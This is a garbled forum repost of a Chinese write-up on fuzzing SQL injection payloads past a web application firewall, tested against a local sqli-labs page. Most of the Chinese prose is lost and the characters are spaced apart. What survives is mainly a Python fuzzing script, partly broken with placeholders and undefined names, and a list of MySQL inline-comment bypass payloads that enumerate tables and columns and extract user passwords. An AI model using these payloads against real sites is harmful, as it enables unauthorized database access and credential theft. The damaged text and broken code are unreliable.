搜索

[16875] 2021-06-06_记一次Fuzz绕WAF实现SQL注入

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2021-06-06_记一次Fuzz绕WAF实现SQL注入 F u z z W A F S Q L   l i a n g x i a o f e i   F r e e B u f   2 0 2 1 - 0 6 - 0 6 0 × 0 0 使 P y t h o n W A F S Q L F u z z F u z z w a f 使 F u z z w a f p a y l o a d 0 × 0 1 S Q L w a f 使   使 / * * /   # 使 / ! * * / m y s q l 使 / * ! 5 0 0 0   u n i o n   s e l e c t   x , x , x / u s e r - a g e n t . 0 × 0 2   使 使 / * * / F u z z s q l W A F 使 a p a c h e m y s q l p h p s t u d y 访 S Q L .
? i d = 1   u n i o n   s e l e c t   1 , 2 , 3 +     ? i d = 1   / u n i o n   / s e l e c t   1 , 2 , 3 +     ? i d = 1   / u n i o n   /   1 , 2 , 3 +   ? i d = 1   u n i o n   1 , 2 , 3 + ? i d = 1   s e l e c t   1 , 2 , 3 + u n i o n s e l e c t 使 使 / % 0 a / u n i o n / % 0 a / s e l e c t / % 0 a / 1 , 2 , 3 +     P S : % 0 a 使 p y t h o n f u z z % 0 a , % 2 3 F r o m   u r l l i b   i m p o r t   r e q u e s t s i m p o r t   t i m e u r l = ' h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 / s q l i l a b s / L e s s - 2 / ? i d = - 1 ' u n i o n = ' u n i o n ' s e l e c t = ' s e l e c t ' n u m = ' 1 , 2 , 3 ' l = { ' % 0 a ' , ' % 2 3 ' } l l = { ' S ' } l l l = { ' % 0 a ' , ' % 2 3 ' }
0 × 0 3   h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 8 0 / s q l i l a b s / L e s s - 2 / ? i d = - 1 / S % 0 a / u n i o n / x % 0 a / s e l e c t / x % 0 a /   1 , 2 , 3 x = ' / * ! ' f = ' * / ' d e f   b y p a s s ( ) : f o r   x i a o f e i   i n   a : 6 t f o r   x i a o f e i i   i n   l l : f o r   x i a o f e i i i   i n l l l : f o r   t w o   i n   r a n g e ( ? , ? ) :       # ? u r l s = u r l + x i a o f e i + x i a o f e i i + x i a o f e i i i + l l + s t r ( t w o ) + u n i o n + l l l + x i a o f e i + x i a o d i s + x i a o f e i i + s e l e c t + x i a o f e i + x i a o f e i i + x i a o f e i i i + n u m t r y : r e s u l t = r e q u e s t s . g e t ( u r l s ) . t e x t l e n _ r = l e n ( r e s u l t )   # l e n ( )   i f   ( r e s u l t . f i n d ( ' s a f e d o g ' )   = =   - 1 ) : # p r i n t ( ' b y p a s s   u r l   a d d r e e s s '   +   u r l s   +   ' | '   +   s t r ( l e n _ r ) ) p r i n t ( ' b y p a s s   u r l   a d d r e e s s ' + u r l s + ' | ' + s t r ( l e n _ r ) ) i f   l e n _ r = = 7 1 5 : f p   =   o p e n ( ' u r l . t x t ' ,   ' l + ' ) f p . w r i t e ( u r l s   +   ' n ' ) f p . c l o s e ( ) e x c e p t   E x c e p t i o n   a s   e r r : p r i n t ( ' c o n n e c t i n g   e r r o r ' ) t i m e . s l e e p ( 0 . 1 ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' : p r i n t ( ' f u z z   s t r a t ! ' ) b y p a s s ( )
0 × 0 4   p a y l o a d ? i d = 1   / ! 2 0 0 0 0 o r d e r / b y   3 + ? i d = - 1   u n i o n   / ! 0 0 0 0 0 a l l   s e l e c t /   1 , 2 , 3 + ? i d = - 1   u n i o n   / ! 0 0 0 0 0 a l l   s e l e c t /   1 , d a t a b a s e / * * / ( ) , 3 + ? i d = - 1   u n i o n   / ! 0 0 0 0 0 a l l /   / ! 0 0 0 0 0 s e l e c t   1 , 2 , t a b l e _ n a m e   f r o m /   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = s e c u r i t y   l i m i t   3 , 1   - - + ? i d = - 1   u n i o n   / ! 0 0 0 0 0 a l l /   / ! 0 0 0 0 0 s e l e c t   1 , 2 , c o l u m n _ n a m e   f r o m /   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = u s e r s   l i m i t   2 , 1   - - + ? i d = - 1   u n i o n   / ! 0 0 0 0 0 a l l /   / ! 0 0 0 0 0 s e l e c t   1 , 2 , p a s s w o r d   f r o m /   u s e r s   l i m i t   1 , 1   - - +

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理